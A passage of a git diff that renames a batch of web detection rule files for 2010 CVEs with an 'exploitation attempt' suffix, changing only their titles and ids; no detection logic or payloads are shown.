...-1718.yaml => web_cve-2010-1718_exploitation_attempt.yaml} | 4 ++-- ...-1719.yaml => web_cve-2010-1719_exploitation_attempt.yaml} | 4 ++-- ...-1722.yaml => web_cve-2010-1722_exploitation_attempt.yaml} | 4 ++-- ...-1875.yaml => web_cve-2010-1875_exploitation_attempt.yaml} | 4 ++-- ...-1953.yaml => web_cve-2010-1953_exploitation_attempt.yaml} | 4 ++-- ...-1954.yaml => web_cve-2010-1954_exploitation_attempt.yaml} | 4 ++-- ...-1955.yaml => web_cve-2010-1955_exploitation_attempt.yaml} | 4 ++-- ...-1956.yaml => web_cve-2010-1956_exploitation_attempt.yaml} | 4 ++-- ...-1979.yaml => web_cve-2010-1979_exploitation_attempt.yaml} | 4 ++-- ...-1980.yaml => web_cve-2010-1980_exploitation_attempt.yaml} | 4 ++-- ...-1981.yaml => web_cve-2010-1981_exploitation_attempt.yaml} | 4 ++-- ...-1983.yaml => web_cve-2010-1983_exploitation_attempt.yaml} | 4 ++-- ...-2033.yaml => web_cve-2010-2033_exploitation_attempt.yaml} | 4 ++-- ...-2034.yaml => web_cve-2010-2034_exploitation_attempt.yaml} | 4 ++-- ...-2035.yaml => web_cve-2010-2035_exploitation_attempt.yaml} | 4 ++-- ...-2036.yaml => web_cve-2010-2036_exploitation_attempt.yaml} | 4 ++-- ...-2122.yaml => web_cve-2010-2122_exploitation_attempt.yaml} | 4 ++-- ...-2259.yaml => web_cve-2010-2259_exploitation_attempt.yaml} | 4 ++-- ...-2307.yaml => web_cve-2010-2307_exploitation_attempt.yaml} | 4 ++-- ...-2682.yaml => web_cve-2010-2682_exploitation_attempt.yaml} | 4 ++-- ...-2861.yaml => web_cve-2010-2861_exploitation_attempt.yaml} | 4 ++-- ...-2920.yaml => web_cve-2010-2920_exploitation_attempt.yaml} | 4 ++-- ...-3426.yaml => web_cve-2010-3426_exploitation_attempt.yaml} | 4 ++-- ...-4231.yaml => web_cve-2010-4231_exploitation_attempt.yaml} | 4 ++-- ...-4617.yaml => web_cve-2010-4617_exploitation_attempt.yaml} | 4 ++-- ...-5278.yaml => web_cve-2010-5278_exploitation_attempt.yaml} | 4 ++-- 61 files changed, 122 insertions(+), 122 deletions(-) rename rules/web/{web_cve-2010-0943.yaml => web_cve-2010-0943_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-0944.yaml => web_cve-2010-0944_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-0985.yaml => web_cve-2010-0985_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1219.yaml => web_cve-2010-1219_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1304.yaml => web_cve-2010-1304_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1305.yaml => web_cve-2010-1305_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1306.yaml => web_cve-2010-1306_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1307.yaml => web_cve-2010-1307_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1308.yaml => web_cve-2010-1308_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1312.yaml => web_cve-2010-1312_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1313.yaml => web_cve-2010-1313_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1314.yaml => web_cve-2010-1314_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1345.yaml => web_cve-2010-1345_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1353.yaml => web_cve-2010-1353_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1354.yaml => web_cve-2010-1354_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1470.yaml => web_cve-2010-1470_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1471.yaml => web_cve-2010-1471_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1472.yaml => web_cve-2010-1472_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1473.yaml => web_cve-2010-1473_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1474.yaml => web_cve-2010-1474_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1475.yaml => web_cve-2010-1475_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1476.yaml => web_cve-2010-1476_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1494.yaml => web_cve-2010-1494_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1495.yaml => web_cve-2010-1495_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1532.yaml => web_cve-2010-1532_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1533.yaml => web_cve-2010-1533_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1534.yaml => web_cve-2010-1534_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1535.yaml => web_cve-2010-1535_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1601.yaml => web_cve-2010-1601_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1602.yaml => web_cve-2010-1602_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1607.yaml => web_cve-2010-1607_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1657.yaml => web_cve-2010-1657_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1659.yaml => web_cve-2010-1659_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1714.yaml => web_cve-2010-1714_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1717.yaml => web_cve-2010-1717_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1718.yaml => web_cve-2010-1718_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1719.yaml => web_cve-2010-1719_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1722.yaml => web_cve-2010-1722_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1875.yaml => web_cve-2010-1875_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1953.yaml => web_cve-2010-1953_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1954.yaml => web_cve-2010-1954_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1955.yaml => web_cve-2010-1955_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1956.yaml => web_cve-2010-1956_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1979.yaml => web_cve-2010-1979_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1980.yaml => web_cve-2010-1980_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-1981.yaml => web_cve-2010-1981_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-1983.yaml => web_cve-2010-1983_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-2033.yaml => web_cve-2010-2033_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-2034.yaml => web_cve-2010-2034_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-2035.yaml => web_cve-2010-2035_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-2036.yaml => web_cve-2010-2036_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-2122.yaml => web_cve-2010-2122_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-2259.yaml => web_cve-2010-2259_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-2307.yaml => web_cve-2010-2307_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-2682.yaml => web_cve-2010-2682_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-2861.yaml => web_cve-2010-2861_exploitation_attempt.yaml} (91%) rename rules/web/{web_cve-2010-2920.yaml => web_cve-2010-2920_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-3426.yaml => web_cve-2010-3426_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-4231.yaml => web_cve-2010-4231_exploitation_attempt.yaml} (89%) rename rules/web/{web_cve-2010-4617.yaml => web_cve-2010-4617_exploitation_attempt.yaml} (90%) rename rules/web/{web_cve-2010-5278.yaml => web_cve-2010-5278_exploitation_attempt.yaml} (90%) diff --git a/rules/web/web_cve-2010-0943.yaml b/rules/web/web_cve-2010-0943_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-0943.yaml rename to rules/web/web_cve-2010-0943_exploitation_attempt.yaml index 52d23982..e36f9ca0 100644 --- a/rules/web/web_cve-2010-0943.yaml +++ b/rules/web/web_cve-2010-0943_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-0943 exploitation attempt -id: 7341b3ab-aed8-470b-b3b3-baee54357b21 +title: CVE-2010-0943 Exploitation Attempt +id: 3b8a0723-2e41-43ef-b56a-0ebf5859871c author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-0944.yaml b/rules/web/web_cve-2010-0944_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-0944.yaml rename to rules/web/web_cve-2010-0944_exploitation_attempt.yaml index 3bcd121b..caf28629 100644 --- a/rules/web/web_cve-2010-0944.yaml +++ b/rules/web/web_cve-2010-0944_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-0944 exploitation attempt -id: 99eb6dd1-7eef-4210-862c-a4289b0eb3c1 +title: CVE-2010-0944 Exploitation Attempt +id: 9a6621c8-26ce-4fa1-a081-5092a31df9f1 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-0985.yaml b/rules/web/web_cve-2010-0985_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-0985.yaml rename to rules/web/web_cve-2010-0985_exploitation_attempt.yaml index 13e1971a..41d2adcf 100644 --- a/rules/web/web_cve-2010-0985.yaml +++ b/rules/web/web_cve-2010-0985_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-0985 exploitation attempt -id: 299f62c1-9e8a-43cc-b018-98d469f5654b +title: CVE-2010-0985 Exploitation Attempt +id: 65eb9e0e-d8ea-4dbb-bdb1-8a7bfe726218 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1219.yaml b/rules/web/web_cve-2010-1219_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1219.yaml rename to rules/web/web_cve-2010-1219_exploitation_attempt.yaml index 741d57a3..70470533 100644 --- a/rules/web/web_cve-2010-1219.yaml +++ b/rules/web/web_cve-2010-1219_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1219 exploitation attempt -id: c72b9df0-2e24-4c59-a18d-2ce9f309011c +title: CVE-2010-1219 Exploitation Attempt +id: 5c13b413-1c5d-471e-b5d0-502d67c2cfff author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1304.yaml b/rules/web/web_cve-2010-1304_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1304.yaml rename to rules/web/web_cve-2010-1304_exploitation_attempt.yaml index 62c8e768..e90d45b9 100644 --- a/rules/web/web_cve-2010-1304.yaml +++ b/rules/web/web_cve-2010-1304_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1304 exploitation attempt -id: d43a3260-6661-4963-ae51-1516b410eab4 +title: CVE-2010-1304 Exploitation Attempt +id: b9f646f1-1e8d-4213-a122-e8cfb2526f7e author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1305.yaml b/rules/web/web_cve-2010-1305_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1305.yaml rename to rules/web/web_cve-2010-1305_exploitation_attempt.yaml index ac18cb0a..e1fd2002 100644 --- a/rules/web/web_cve-2010-1305.yaml +++ b/rules/web/web_cve-2010-1305_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1305 exploitation attempt -id: 4ad4e3e9-c2ec-4f11-ae69-686317089de1 +title: CVE-2010-1305 Exploitation Attempt +id: b80d67c0-e544-463e-8db0-cfa6fd1062c7 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1306.yaml b/rules/web/web_cve-2010-1306_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1306.yaml rename to rules/web/web_cve-2010-1306_exploitation_attempt.yaml index 8efdc7f9..b3c45a34 100644 --- a/rules/web/web_cve-2010-1306.yaml +++ b/rules/web/web_cve-2010-1306_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1306 exploitation attempt -id: 6eef2e17-dda2-4c9d-8e1f-9f28d02cbb68 +title: CVE-2010-1306 Exploitation Attempt +id: 18655982-0c25-41ca-99a9-66c081e5c28e author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1307.yaml b/rules/web/web_cve-2010-1307_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1307.yaml rename to rules/web/web_cve-2010-1307_exploitation_attempt.yaml index 15558f07..a0c1b093 100644 --- a/rules/web/web_cve-2010-1307.yaml +++ b/rules/web/web_cve-2010-1307_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1307 exploitation attempt -id: 57eb5063-d907-440a-8194-6a304a2c33dc +title: CVE-2010-1307 Exploitation Attempt +id: 1f6127b7-58d0-428e-afd6-3daa7093f500 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1308.yaml b/rules/web/web_cve-2010-1308_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1308.yaml rename to rules/web/web_cve-2010-1308_exploitation_attempt.yaml index bf0e78b5..5e7dfeb6 100644 --- a/rules/web/web_cve-2010-1308.yaml +++ b/rules/web/web_cve-2010-1308_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1308 exploitation attempt -id: 2ab1d26f-292d-48ef-b821-30000ca2d796 +title: CVE-2010-1308 Exploitation Attempt +id: e7fa765b-d565-42e4-b03e-44a52a25c00a author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1312.yaml b/rules/web/web_cve-2010-1312_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1312.yaml rename to rules/web/web_cve-2010-1312_exploitation_attempt.yaml index 8dff6589..4d863fd3 100644 --- a/rules/web/web_cve-2010-1312.yaml +++ b/rules/web/web_cve-2010-1312_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1312 exploitation attempt -id: 72d483b1-ef4e-4da4-a56b-d388d5fc55e4 +title: CVE-2010-1312 Exploitation Attempt +id: ffb67143-f136-490b-a593-abc36e0a2f44 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1313.yaml b/rules/web/web_cve-2010-1313_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1313.yaml rename to rules/web/web_cve-2010-1313_exploitation_attempt.yaml index 6722ac48..d132790f 100644 --- a/rules/web/web_cve-2010-1313.yaml +++ b/rules/web/web_cve-2010-1313_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1313 exploitation attempt -id: a9cfe674-5625-47c0-aa7b-ed19fb5aebc1 +title: CVE-2010-1313 Exploitation Attempt +id: 73c88bfc-5e2a-4fac-b2b2-01b29b565d09 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1314.yaml b/rules/web/web_cve-2010-1314_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1314.yaml rename to rules/web/web_cve-2010-1314_exploitation_attempt.yaml index 37a26d24..57b4b947 100644 --- a/rules/web/web_cve-2010-1314.yaml +++ b/rules/web/web_cve-2010-1314_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1314 exploitation attempt -id: c54f2a94-b8eb-4b33-a430-f219b97a85e1 +title: CVE-2010-1314 Exploitation Attempt +id: bab4e9de-2dab-4471-914b-319ddf29735f author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1345.yaml b/rules/web/web_cve-2010-1345_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1345.yaml rename to rules/web/web_cve-2010-1345_exploitation_attempt.yaml index b26bd3bb..1a75fecb 100644 --- a/rules/web/web_cve-2010-1345.yaml +++ b/rules/web/web_cve-2010-1345_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1345 exploitation attempt -id: a14d080c-2aa0-4d7b-bffd-06f0e325bd0c +title: CVE-2010-1345 Exploitation Attempt +id: 8e52016c-f42b-4d53-9812-5079fa88bb9a author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1353.yaml b/rules/web/web_cve-2010-1353_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1353.yaml rename to rules/web/web_cve-2010-1353_exploitation_attempt.yaml index 35fc5a28..978f2bd2 100644 --- a/rules/web/web_cve-2010-1353.yaml +++ b/rules/web/web_cve-2010-1353_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1353 exploitation attempt -id: 9506788c-d0d6-4671-92b5-61a07cd5a056 +title: CVE-2010-1353 Exploitation Attempt +id: 58e30700-499a-4d21-9c7b-8727e5f8b6e7 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1354.yaml b/rules/web/web_cve-2010-1354_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1354.yaml rename to rules/web/web_cve-2010-1354_exploitation_attempt.yaml index c6044615..86e14aa8 100644 --- a/rules/web/web_cve-2010-1354.yaml +++ b/rules/web/web_cve-2010-1354_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1354 exploitation attempt -id: bf6bdfcf-7229-4812-8188-9c778d97ed63 +title: CVE-2010-1354 Exploitation Attempt +id: 9d0cfe31-7ead-4c4c-8b33-b77c2a42ca24 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1470.yaml b/rules/web/web_cve-2010-1470_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1470.yaml rename to rules/web/web_cve-2010-1470_exploitation_attempt.yaml index 618ab28d..a3480662 100644 --- a/rules/web/web_cve-2010-1470.yaml +++ b/rules/web/web_cve-2010-1470_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1470 exploitation attempt -id: 2b631e08-2471-4b98-a385-f420ebf1f406 +title: CVE-2010-1470 Exploitation Attempt +id: 3dcb67ad-1b33-4721-8386-7cfccd0e3684 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1471.yaml b/rules/web/web_cve-2010-1471_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1471.yaml rename to rules/web/web_cve-2010-1471_exploitation_attempt.yaml index 6e082197..8043e1a0 100644 --- a/rules/web/web_cve-2010-1471.yaml +++ b/rules/web/web_cve-2010-1471_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1471 exploitation attempt -id: cb214df9-5948-4967-ba0b-4a5ad197313e +title: CVE-2010-1471 Exploitation Attempt +id: ae585c7e-f75e-4b76-b7cd-a7c3eed7065f author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1472.yaml b/rules/web/web_cve-2010-1472_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1472.yaml rename to rules/web/web_cve-2010-1472_exploitation_attempt.yaml index cb94d57c..b85aaaea 100644 --- a/rules/web/web_cve-2010-1472.yaml +++ b/rules/web/web_cve-2010-1472_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1472 exploitation attempt -id: 9878af5a-91d9-474f-b4ff-4874db061c90 +title: CVE-2010-1472 Exploitation Attempt +id: 7472bddd-70cf-409b-8cdd-30c134bcda60 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1473.yaml b/rules/web/web_cve-2010-1473_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1473.yaml rename to rules/web/web_cve-2010-1473_exploitation_attempt.yaml index a7824e77..1c46d760 100644 --- a/rules/web/web_cve-2010-1473.yaml +++ b/rules/web/web_cve-2010-1473_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1473 exploitation attempt -id: 09fe8c14-2dd6-4c16-9610-54e9762acd81 +title: CVE-2010-1473 Exploitation Attempt +id: 2be15734-06fe-4383-8ee4-721d4f8b0a70 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1474.yaml b/rules/web/web_cve-2010-1474_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1474.yaml rename to rules/web/web_cve-2010-1474_exploitation_attempt.yaml index 7d7dc15c..83bf15da 100644 --- a/rules/web/web_cve-2010-1474.yaml +++ b/rules/web/web_cve-2010-1474_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1474 exploitation attempt -id: 7d738208-638c-4e01-a694-b507cae881a6 +title: CVE-2010-1474 Exploitation Attempt +id: b68d5d20-e6ca-425a-9681-93e924c2918b author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1475.yaml b/rules/web/web_cve-2010-1475_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1475.yaml rename to rules/web/web_cve-2010-1475_exploitation_attempt.yaml index 4f733e47..9806d633 100644 --- a/rules/web/web_cve-2010-1475.yaml +++ b/rules/web/web_cve-2010-1475_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1475 exploitation attempt -id: c9db721a-f2c1-4e8a-8f6a-b31aa0e51374 +title: CVE-2010-1475 Exploitation Attempt +id: 11c50fbe-f54a-4c32-a0ae-9d3ab2b0f547 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1476.yaml b/rules/web/web_cve-2010-1476_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1476.yaml rename to rules/web/web_cve-2010-1476_exploitation_attempt.yaml index 17650b59..fc7dcc00 100644 --- a/rules/web/web_cve-2010-1476.yaml +++ b/rules/web/web_cve-2010-1476_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1476 exploitation attempt -id: 65239f96-f508-4941-b537-7837471ddcad +title: CVE-2010-1476 Exploitation Attempt +id: cc5df87f-99ed-486a-8805-d8b97c5bd5bb author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1494.yaml b/rules/web/web_cve-2010-1494_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1494.yaml rename to rules/web/web_cve-2010-1494_exploitation_attempt.yaml index bc6b7544..e492dff6 100644 --- a/rules/web/web_cve-2010-1494.yaml +++ b/rules/web/web_cve-2010-1494_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1494 exploitation attempt -id: 2ab0992e-1f93-499b-b1e6-580b651c151e +title: CVE-2010-1494 Exploitation Attempt +id: 82fc453a-8032-444e-9801-e6ad7b3e3a9c author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1495.yaml b/rules/web/web_cve-2010-1495_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1495.yaml rename to rules/web/web_cve-2010-1495_exploitation_attempt.yaml index 820bb00c..8b5b8588 100644 --- a/rules/web/web_cve-2010-1495.yaml +++ b/rules/web/web_cve-2010-1495_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1495 exploitation attempt -id: 16173107-1da6-4bb0-884c-0113ca1bd22c +title: CVE-2010-1495 Exploitation Attempt +id: eede38ab-67a5-47cd-a0e4-65e82824378d author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1532.yaml b/rules/web/web_cve-2010-1532_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1532.yaml rename to rules/web/web_cve-2010-1532_exploitation_attempt.yaml index 3b477e4e..bd2e252a 100644 --- a/rules/web/web_cve-2010-1532.yaml +++ b/rules/web/web_cve-2010-1532_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1532 exploitation attempt -id: b0caca18-cbcd-4e57-8d26-5aa5ab1dae90 +title: CVE-2010-1532 Exploitation Attempt +id: 7185db2e-b76b-4a9f-b157-51a7f799de43 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1533.yaml b/rules/web/web_cve-2010-1533_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1533.yaml rename to rules/web/web_cve-2010-1533_exploitation_attempt.yaml index 989feccd..1e779cd7 100644 --- a/rules/web/web_cve-2010-1533.yaml +++ b/rules/web/web_cve-2010-1533_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1533 exploitation attempt -id: 900bac77-29fa-47d7-a2cc-a2b259e5aa34 +title: CVE-2010-1533 Exploitation Attempt +id: 4f6c4eef-bd44-4d25-8a4a-7f84a1748ec6 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1534.yaml b/rules/web/web_cve-2010-1534_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1534.yaml rename to rules/web/web_cve-2010-1534_exploitation_attempt.yaml index 71b30ef2..1649ce5f 100644 --- a/rules/web/web_cve-2010-1534.yaml +++ b/rules/web/web_cve-2010-1534_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1534 exploitation attempt -id: 8315e276-a65f-4617-a32b-668d19b0dcf2 +title: CVE-2010-1534 Exploitation Attempt +id: 25de4419-cce2-4b62-8204-8a4e38114c09 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1535.yaml b/rules/web/web_cve-2010-1535_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1535.yaml rename to rules/web/web_cve-2010-1535_exploitation_attempt.yaml index 6c1045d0..ce87bdec 100644 --- a/rules/web/web_cve-2010-1535.yaml +++ b/rules/web/web_cve-2010-1535_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1535 exploitation attempt -id: c0e76601-93b3-4ccf-9d62-95c083ea375d +title: CVE-2010-1535 Exploitation Attempt +id: df8fe6a5-b4a6-4d8f-bd32-b6456544d0f8 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1601.yaml b/rules/web/web_cve-2010-1601_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1601.yaml rename to rules/web/web_cve-2010-1601_exploitation_attempt.yaml index c414ea49..a715d0fa 100644 --- a/rules/web/web_cve-2010-1601.yaml +++ b/rules/web/web_cve-2010-1601_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1601 exploitation attempt -id: ceac625a-0a44-4cab-ba06-1d0d6cacfd89 +title: CVE-2010-1601 Exploitation Attempt +id: cfd25065-8f6b-4181-bda1-e3507b51b114 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1602.yaml b/rules/web/web_cve-2010-1602_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1602.yaml rename to rules/web/web_cve-2010-1602_exploitation_attempt.yaml index 8bc9d320..41d81aec 100644 --- a/rules/web/web_cve-2010-1602.yaml +++ b/rules/web/web_cve-2010-1602_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1602 exploitation attempt -id: 63b0013c-c10d-4f45-a0f5-b918514d6721 +title: CVE-2010-1602 Exploitation Attempt +id: 6a5cc49b-2487-4ec4-8c33-c7d7ba2a3196 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1607.yaml b/rules/web/web_cve-2010-1607_exploitation_attempt.yaml similarity index 90% rename from rules/web/web_cve-2010-1607.yaml rename to rules/web/web_cve-2010-1607_exploitation_attempt.yaml index 88e7fa06..f95b2209 100644 --- a/rules/web/web_cve-2010-1607.yaml +++ b/rules/web/web_cve-2010-1607_exploitation_attempt.yaml @@ -1,5 +1,5 @@ -title: CVE-2010-1607 exploitation attempt -id: fc8d65e0-cbed-434d-b881-28aa0346d408 +title: CVE-2010-1607 Exploitation Attempt +id: 02ad707d-11d8-4654-93b7-668ee425618c author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental diff --git a/rules/web/web_cve-2010-1657.yaml b/rules/web/web_cve-2010-1657_exploitation_attempt.yaml similarity index 89% rename from rules/web/web_cve-2010-1657.yaml rename to rules/web/web_cve-2010-1657_exploitation_attempt.yaml index 2dd7914c..ee93c1d6 100644 --- a/rules/web/web_cve-2010-1657.yaml +++ 